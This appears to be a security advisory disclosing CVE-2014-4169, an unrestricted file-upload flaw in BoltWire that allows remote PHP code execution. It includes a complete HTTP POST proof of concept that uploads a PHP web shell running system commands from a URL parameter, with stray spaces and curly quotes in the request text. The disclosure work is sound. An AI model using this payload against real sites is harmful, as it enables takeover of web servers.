Unrestricted Upload of File with Dangerous Type in BoltWire

High-Tech Bridge Security Research Lab discovered vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application.

1. Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169

The vulnerability exists due to insufficient validation of the filename when uploading files in “/index.php” script. A remote authenticated attacker can upload arbitrary file with “.txt” extension and rename it into “.php” using a specially crafted HTTP POST request. Successful exploitation of the vulnerability requires valid user credentials, but registration is open by default to anyone. The vulnerability allows execution of arbitrary PHP code with privileges of the webserver and can lead to complete compromise of the website.

The following dump of the HTTP POST request illustrates the upload of the file named “file.txt” and its renaming into “file.php”, with contents, which allows execution of arbitrary system commands:

POST /index.php?p=action.upload HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------312591666129281
Content-Length: 538

-----------------------------312591666129281
Content-Disposition: form-data; name=“boltkey”

9867614
-----------------------------312591666129281
Con tent-Disposition: form-data; name=“upload”; filename=“file.txt”
Content-Type: text/plain

<?
passthru($_GET[‘cmd’]);
?>

------------------------- ----312591666129281
Content-Disposition: form-data; name=“filename”

file.php
-----------------------------312591666129281
C ontent-Disposition: form-data; name=“submit”

UPLOAD
-----------------------------312591666129281–

The uploaded file will be accessible using the following URL:

http://[host]/files/file.php?cmd=ls